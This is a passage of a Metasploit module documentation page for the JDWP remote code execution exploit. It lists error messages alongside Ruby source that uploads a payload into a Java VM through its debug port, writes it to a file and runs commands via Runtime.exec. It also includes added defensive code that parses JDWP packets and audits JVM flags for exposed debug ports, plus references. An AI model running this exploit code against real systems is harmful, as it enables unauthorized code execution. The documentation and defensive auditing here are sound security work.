  data = [TAG_OBJECT].pack('C')
  data << format(size, cmd_obj_id)
  data_array = [data]
  runtime_class, runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
  buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
  fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')

  str = unformat(size, buf[1..1+size-1])
  @os = solve_string(format(@vars["objectid_size"], str))
end

Failed to allocate string for filename
Here is a relevant code snippet related to the "Failed to allocate string for filename" error message:
end

# Creates a file on the server given an execution thread
def create_file(thread_id, filename)
  cmd_obj_ids = create_string(filename)
  fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0

  cmd_obj_id = cmd_obj_ids[0]["obj_id"]
  size = @vars["objectid_size"]
  data = [TAG_OBJECT].pack('C')
  data << format(size, cmd_obj_id)
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:
  data = [TAG_OBJECT].pack('C')
  data << format(size, cmd_obj_id)
  data_array = [data]
  runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
  buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
  fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')

  file = unformat(size, buf[1..1+size-1])
  fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)

  register_files_for_cleanup(filename)
Failed to create file. Try to change the TMP_PATH
Here is a relevant code snippet related to the "Failed to create file. Try to change the TMP_PATH" error message:
  runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
  buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
  fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')

  file = unformat(size, buf[1..1+size-1])
  fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)

  register_files_for_cleanup(filename)

  file
end
Unexpected returned type: expected Array
Here is a relevant code snippet related to the "Unexpected returned type: expected Array" error message:
# Stores the payload on a new string created in target VM
def upload_payload(thread_id, pl_exe)
  size = @vars["objectid_size"]

  buf = create_array(pl_exe.length)
  fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')

  pl = unformat(size, buf[1..1+size-1])
  fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)

  set_values(pl, pl_exe.bytes)
Failed to create byte array to store payload
Here is a relevant code snippet related to the "Failed to create byte array to store payload" error message:

  buf = create_array(pl_exe.length)
  fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')

  pl = unformat(size, buf[1..1+size-1])
  fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)

  set_values(pl, pl_exe.bytes)
  pl
end

Exception while writing to file
Here is a relevant code snippet related to the "Exception while writing to file" error message:
  data << format(size, pl)
  data_array = [data]
  runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
  buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
  unless buf[0] == [TAG_VOID].pack('C')
    fail_with(Failure::Unknown, "Exception while writing to file")
  end
end

# Closes a file on the server given an execution thread
def close_file(thread_id, file)
Exception while closing file
Here is a relevant code snippet related to the "Exception while closing file" error message:
# Closes a file on the server given an execution thread
def close_file(thread_id, file)
  runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
  buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
  unless buf[0] == [TAG_VOID].pack('C')
    fail_with(Failure::Unknown, "Exception while closing file")
  end
end

# Executes a system command on target VM making use of java.lang.Runtime.exec()
def execute_command(thread_id, cmd)
Failed to allocate string for payload dumping
Here is a relevant code snippet related to the "Failed to allocate string for payload dumping" error message:
  size = @vars["objectid_size"]

  # 1. Creates a string on target VM with the command to be executed
  cmd_obj_ids = create_string(cmd)
  if cmd_obj_ids.length == 0
    fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
  end

  cmd_obj_id = cmd_obj_ids[0]["obj_id"]

  # 2. Gets Runtime context
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:

  # 2. Gets Runtime context
  runtime_class, runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
  buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
  unless buf[0] == [TAG_OBJECT].pack('C')
    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
  end

  rt = unformat(size, buf[1..1+size-1])
  if rt.nil? || (rt == 0)
    fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
Failed to invoke Runtime.getRuntime()
Here is a relevant code snippet related to the "Failed to invoke Runtime.getRuntime()" error message:
    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
  end

  rt = unformat(size, buf[1..1+size-1])
  if rt.nil? || (rt == 0)
    fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
  end

  # 3. Finds and executes "exec" method supplying the string with the command
  exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
  if exec_meth.nil?
Cannot find method Runtime.exec()
Here is a relevant code snippet related to the "Cannot find method Runtime.exec()" error message:
  end

  # 3. Finds and executes "exec" method supplying the string with the command
  exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
  if exec_meth.nil?
    fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
  end

  data = [TAG_OBJECT].pack('C')
  data << format(size, cmd_obj_id)
  data_array = [data]
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:
  data = [TAG_OBJECT].pack('C')
  data << format(size, cmd_obj_id)
  data_array = [data]
  buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
  unless buf[0] == [TAG_OBJECT].pack('C')
    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
  end
end

# Set event for stepping into a running thread
def set_step_event
Could not find a suitable thread for stepping
Here is a relevant code snippet related to the "Could not find a suitable thread for stepping" error message:
    if thread_status(thread) == THREAD_SLEEPING_STATUS
      t_id = thread
      break
    end
  end
  fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?

  # 2. Suspend the VM before setting the event
  suspend_vm

  vprint_status("Setting 'step into' event in thread: #{t_id}")
Could not set the event
Here is a relevant code snippet related to the "Could not set the event" error message:
  step_info << [STEP_INTO].pack('N')
  data = [[MODKIND_STEP, step_info]]

  r_id = send_event(EVENT_STEP, data)
  unless r_id
    fail_with(Failure::Unknown, "Could not set the event")
  end

  return r_id, t_id
end

Security attribute not found
Here is a relevant code snippet related to the "Security attribute not found" error message:

  fields.each do |field|
    sec_field = field["field_id"] if field["name"].downcase == "security"
  end

  fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?

  value = get_value(sys_class["reftype_id"], sec_field)

  if value == 0
    print_good("Security manager was not set")
JDWP Protocol not found
Here is a relevant code snippet related to the "JDWP Protocol not found" error message:
  @os = nil

  connect

  unless handshake == HANDSHAKE
    fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
  end

  print_status("Retrieving the sizes of variable sized data types in the target VM...")
  get_sizes

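The snippet above checks the transport handshake and then asks the VM for its ID sizes, which every later format/unformat call depends on. The following Ruby block is an added illustration of that wire format, not the module's own code: it builds and parses JDWP packet headers, decodes the VirtualMachine.IDSizes reply, and round-trips an object ID at the reported width. Constants and layouts are taken from the JDWP specification linked in the references; the sample reply, packet ids and object ID value are constructed.

```ruby
# Added illustration of the JDWP wire format that the handshake, get_sizes and
# format/unformat steps deal with. This is not the module's code; the
# constants and layouts come from the JDWP specification, and the sample
# reply below is constructed.
HANDSHAKE   = 'JDWP-Handshake'.b
HEADER_SIZE = 11     # length(4) + id(4) + flags(1) + cmdset(1)/errcode(2) + cmd(1)
REPLY_FLAG  = 0x80   # flags bit that marks a reply packet
CMDSET_VM   = 1      # VirtualMachine command set
CMD_IDSIZES = 7      # VirtualMachine.IDSizes command

# The transport handshake is the 14-byte magic string echoed back unchanged;
# a peer that echoes it is a live debug agent with no further authentication.
def handshake_ok?(reply)
  reply == HANDSHAKE
end

# Builds a command packet: big-endian length (header included), packet id,
# flags 0, command set, command, then the command-specific data.
def create_packet(id, cmdset, cmd, data = ''.b)
  [HEADER_SIZE + data.bytesize, id, 0, cmdset, cmd].pack('NNCCC') + data
end

# Parses a command or reply packet into a hash. Bytes 9-10 carry a 2-byte
# error code in replies and command set + command in commands.
def parse_packet(buf)
  raise ArgumentError, 'short packet' if buf.bytesize < HEADER_SIZE
  length, id, flags = buf.unpack('NNC')
  raise ArgumentError, 'truncated packet' if buf.bytesize < length
  pkt = { length: length, id: id, flags: flags,
          data: buf.byteslice(HEADER_SIZE, length - HEADER_SIZE) }
  if (flags & REPLY_FLAG) != 0
    pkt[:error] = buf.byteslice(9, 2).unpack1('n')
  else
    pkt[:cmdset], pkt[:cmd] = buf.byteslice(9, 2).unpack('CC')
  end
  pkt
end

# IDSizes reply data: five big-endian ints in this order per the spec. The
# objectid_size value is what the module keeps in @vars["objectid_size"].
def parse_idsizes(data)
  keys = %w[fieldid_size methodid_size objectid_size referencetypeid_size frameid_size]
  keys.zip(data.unpack('N5')).to_h
end

# Encodes an ID into `size` big-endian bytes (what the module's format does).
def format_id(size, id)
  case size
  when 4 then [id].pack('N')
  when 8 then [id].pack('Q>')
  else raise ArgumentError, "unsupported ID size #{size}"
  end
end

# Decodes an ID from `size` big-endian bytes (what the module's unformat does).
def unformat_id(size, buf)
  case size
  when 4 then buf.unpack1('N')
  when 8 then buf.unpack1('Q>')
  else raise ArgumentError, "unsupported ID size #{size}"
  end
end

# Constructed sample reply to IDSizes (packet id 1, error code 0) reporting
# 8-byte IDs of every kind, the usual answer from a 64-bit VM.
def sample_idsizes_reply
  data = [8, 8, 8, 8, 8].pack('N5')
  [HEADER_SIZE + data.bytesize, 1, REPLY_FLAG, 0].pack('NNCn') + data
end

# Walks the request/reply once and round-trips a constructed object ID through
# the encoder at the size the VM reported.
def demo
  request = create_packet(1, CMDSET_VM, CMD_IDSIZES)
  reply   = parse_packet(sample_idsizes_reply)
  sizes   = parse_idsizes(reply[:data])
  oid     = 0x00007f3a00001234
  size    = sizes['objectid_size']
  { request: request, reply: reply, sizes: sizes,
    roundtrip: unformat_id(size, format_id(size, oid)) == oid }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Because the ID widths are negotiated per VM, anything that inspects or filters JDWP traffic (an IDS signature, a proxy) has to read the IDSizes reply first; a parser that hard-codes 8-byte IDs will misalign on a VM that reports 4.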
Received <VALUE> responses that are not a 'step into' event...
Here is a relevant code snippet related to the "Received <VALUE> responses that are not a 'step into' event..." error message:
  print_status("Resuming VM and waiting for an event...")
  response = resume_vm

  unless parse_event(response, r_id, t_id)
    datastore['NUM_RETRIES'].times do |i|
      print_status("Received #{i + 1} responses that are not a 'step into' event...")
      buf = read_reply
      break if parse_event(buf, r_id, t_id)

      # note: `times` yields 0..NUM_RETRIES-1, so this comparison is never true
      if i == datastore['NUM_RETRIES']
        fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
Event not received in <NUM_RETRIES> attempts
Here is a relevant code snippet related to the "Event not received in <NUM_RETRIES> attempts" error message:
      print_status("Received #{i + 1} responses that are not a 'step into' event...")
      buf = read_reply
      break if parse_event(buf, r_id, t_id)

      # note: `times` yields 0..NUM_RETRIES-1, so this comparison is never true
      if i == datastore['NUM_RETRIES']
        fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
      end
    end
  end

  vprint_status("Received matching event from thread #{t_id}")
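Every error path listed above only matters once a JVM is actually listening for a debugger on a reachable socket. The Ruby block below is an added defensive check, not part of the module: given JVM command lines (from process listings, container specs or launch scripts), it reports whether a JDWP agent is configured to listen and on which interface. The option syntax is the JPDA connector syntax (-agentlib:jdwp=... and the older -Xrunjdwp:...); the classification assumes the documented JDK 9 change where address=port alone binds to loopback, whereas JDK 8 and earlier bind every interface. The sample command lines, hostnames and the audit function name are constructed.

```ruby
# Added defensive check, not part of the module: find JVMs whose JDWP agent is
# listening on a reachable socket. Option syntax follows the JPDA connector
# docs; the sample command lines below are constructed.
JDWP_OPT = /(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)/
LOOPBACK_HOSTS = %w[localhost 127.0.0.1 ::1 [::1]].freeze

# Returns the agent's key=value options as a hash, or nil when no agent is set.
def parse_jdwp_options(cmdline)
  m = JDWP_OPT.match(cmdline)
  return nil unless m
  m[1].split(',').each_with_object({}) do |kv, opts|
    key, value = kv.split('=', 2)
    opts[key] = value
  end
end

# Classifies one command line. :risk is one of
#   :loopback           bound to a loopback address only
#   :network_reachable  bound to '*', 0.0.0.0 or a routable address
#   :depends_on_jdk     port only; JDK 9+ binds loopback, JDK 8 and earlier
#                       bind every interface (treat as exposed until verified)
def jdwp_exposure(cmdline)
  opts = parse_jdwp_options(cmdline)
  return { listening: false, reason: 'no jdwp agent' } if opts.nil?
  return { listening: false, reason: 'transport is not a TCP socket' } unless opts['transport'] == 'dt_socket'
  return { listening: false, reason: 'server=n: the VM connects out, it does not listen' } unless opts['server'] == 'y'

  address = opts['address'].to_s
  if address.include?(':')
    host, port = address.rpartition(':').values_at(0, 2)   # handles [::1]:port too
  else
    host, port = nil, address
  end
  risk = if host.nil?
           :depends_on_jdk
         elsif LOOPBACK_HOSTS.include?(host)
           :loopback
         else
           :network_reachable
         end
  { listening: true, host: host, port: port, risk: risk, suspend: opts['suspend'] }
end

# Constructed sample command lines, one per case.
SAMPLE_CMDLINES = [
  'java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar app.jar',
  'java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8000 -jar app.jar',
  'java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:8000 -jar app.jar',
  'java -Xrunjdwp:transport=dt_socket,server=n,address=debugger.example.internal:8000 -jar app.jar',
  'java -Xmx2g -jar app.jar'
].freeze

# Runs the classifier over a list of command lines and returns one result each.
def audit(cmdlines = SAMPLE_CMDLINES)
  cmdlines.map { |c| jdwp_exposure(c) }
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_CMDLINES.zip(audit).each { |cmd, result| puts "#{result.inspect}  <- #{cmd}" }
end
```

The :depends_on_jdk case is the one that most often slips through review: the same address=8000 flag is harmless on a current JDK and a network-exposed debug port on an older one, so the audit cannot be settled from the flag alone without also knowing the runtime version.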
Related Pull Requests
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #8871 Merged Pull Request: removing slice operators from jdwp_debugger
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7862 Merged Pull Request: Ruby 2.4 local fixes for metasploit-framework
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6526 Merged Pull Request: Peers for the peer god
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
- #5276 Merged Pull Request: Fix and improve JDWP
- #5173 Merged Pull Request: fix fail_with errors
- #3407 Merged Pull Request: Add JDWP RCE for Windows and Linux
References
- CVE: Not available
- OSVDB (96066)
- EDB-27179
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
- https://seclists.org/nmap-dev/2010/q1/867
- https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java
- https://svn.nmap.org/nmap/scripts/jdwp-exec.nse
- http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
See Also
Check also the following modules related to this module:
- exploit/multi/misc/java_jmx_server
- exploit/multi/misc/java_rmi_server
- exploit/multi/browser/java_atomicreferencearray
- exploit/multi/browser/java_calendar_deserialize
- exploit/multi/browser/java_getsoundbank_bof
- exploit/multi/browser/java_jre17_driver_manager
- exploit/multi/browser/java_jre17_exec
- exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
- exploit/multi/browser/java_jre17_jaxws
- exploit/multi/browser/java_jre17_jmxbean
- exploit/multi/browser/java_jre17_jmxbean_2
- exploit/multi/browser/java_jre17_method_handle
- exploit/multi/browser/java_jre17_provider_skeleton
- exploit/multi/browser/java_jre17_reflection_types
- exploit/multi/browser/java_rhino
- exploit/multi/browser/java_rmi_connection_impl
- exploit/multi/browser/java_setdifficm_bof
- exploit/multi/browser/java_signed_applet
- exploit/multi/browser/java_storeimagearray
- exploit/multi/browser/java_trusted_chain
- exploit/multi/browser/java_verifier_field_access
- auxiliary/admin/zend/java_bridge
- auxiliary/gather/java_rmi_registry
- auxiliary/scanner/misc/java_jmx_server
- auxiliary/scanner/misc/java_rmi_server
- exploit/windows/browser/java_basicservice_impl
- exploit/windows/browser/java_cmm
- exploit/windows/browser/java_codebase_trust
- exploit/windows/browser/java_docbase_bof
- exploit/windows/browser/java_mixer_sequencer
- exploit/windows/browser/java_ws_arginject_altjvm
- exploit/windows/browser/java_ws_double_quote
- exploit/windows/browser/java_ws_vmargs
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/zend_java_bridge
Authors
- Michael Schierl
- Christophe Alladoum
- Redsadic <julian.vilas[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.